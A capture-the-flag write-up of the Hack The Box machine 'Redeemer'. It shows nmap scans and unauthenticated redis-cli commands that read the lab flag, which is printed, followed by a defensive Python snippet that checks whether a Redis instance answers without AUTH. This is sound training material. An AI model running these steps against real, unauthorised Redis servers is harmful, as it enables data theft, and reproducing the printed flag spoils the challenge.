Redeemer - Hack The Box
by
Summary
Redeemer is a very easy HTB machine focusing on exploiting an exposed Redis database with no authentication. The goal is to enumerate open ports, connect to Redis, and retrieve the stored flag.
Target Information
- IP Address: 10.129.10.227
- OS: Linux (based on Redis service)
- Difficulty: Very Easy
- Tags: Redis, Database Exploitation, Anonymous Access, Enumeration
Tools Used
- Nmap: network scanning
- redis-cli: Redis client for interaction
Steps to Exploit
1. Enumerate Open Ports with Nmap
Perform a full TCP scan to discover open ports:
nmap -p- --open 10.129.10.227
Result: Port 6379 open (Redis).
Run a detailed scan on port 6379:
nmap -sC -sV -p 6379 10.129.10.227
Output shows:
6379/tcp open redis Redis key-value store 5.0.7

2. Connect to Redis
Using redis-cli:
redis-cli -h 10.129.10.227
Once connected, list all keys:
KEYS *
Retrieve the value of the key named flag:
GET flag
Flag:
03e1d2b376c37ab3f5319922053953eb

Security Note
Redis should never be exposed to the internet without authentication. Misconfiguration can allow attackers to:
- Read/write sensitive data.
- Persist backdoors on the system.
- Escalate to full system compromise.
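As an added example (not code from the original writeup), this Python snippet shows the RESP wire format redis-cli uses for the KEYS and GET commands above and classifies a server's reply to an unauthenticated probe, so a defender can verify whether an instance still answers without AUTH. The sample replies are constructed, not captured from the box; the NOAUTH and DENIED error prefixes are the real strings Redis returns when requirepass or protected mode is enabled.

```python
# Constructed sample replies for offline testing (not captured from the box):
REPLY_OPEN = b"*1\r\n$4\r\nflag\r\n"                   # KEYS * answered: no auth
REPLY_NOAUTH = b"-NOAUTH Authentication required.\r\n"  # requirepass/ACL enforced
REPLY_DENIED = b"-DENIED Redis is running in protected mode\r\n"


def encode_command(*args: str) -> bytes:
    """Encode a command as redis-cli does: a RESP array of bulk strings."""
    out = [b"*%d\r\n" % len(args)]
    for arg in args:
        raw = arg.encode()
        out.append(b"$%d\r\n%s\r\n" % (len(raw), raw))
    return b"".join(out)


def parse_reply(buf: bytes):
    """Parse one RESP2 reply; return (value, unconsumed_bytes).
    Server errors ('-...') are returned as RuntimeError values, not raised."""
    kind, rest = buf[:1], buf[1:]
    line, _, rest = rest.partition(b"\r\n")
    if kind == b"+":                       # simple string, e.g. +PONG
        return line.decode(), rest
    if kind == b"-":                       # error, e.g. -NOAUTH ...
        return RuntimeError(line.decode()), rest
    if kind == b":":                       # integer
        return int(line), rest
    if kind == b"$":                       # bulk string; $-1 is the null reply
        n = int(line)
        return (None, rest) if n < 0 else (rest[:n], rest[n + 2:])
    if kind == b"*":                       # array of nested replies
        n = int(line)
        if n < 0:
            return None, rest
        items = []
        for _ in range(n):
            item, rest = parse_reply(rest)
            items.append(item)
        return items, rest
    raise ValueError(f"unknown RESP type byte {kind!r}")


def audit(reply_bytes: bytes) -> str:
    """Classify the raw reply to an unauthenticated KEYS/PING probe."""
    value, _ = parse_reply(reply_bytes)
    if isinstance(value, RuntimeError):
        if str(value).startswith("NOAUTH"):
            return "auth-required"         # requirepass or ACLs in place
        if str(value).startswith("DENIED"):
            return "protected-mode"        # non-loopback client refused
        return "error"
    return "open"                          # data returned without AUTH: critical
```

Feeding the bytes read back from a socket after sending encode_command("KEYS", "*") into audit() gives a one-word verdict for each instance; "open" is the state this box was in.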
Key Takeaways
- Always scan for unusual open ports.
- Redis without AUTH is a critical misconfiguration.
- Use nmap --script redis-info for additional enumeration in real-world scenarios.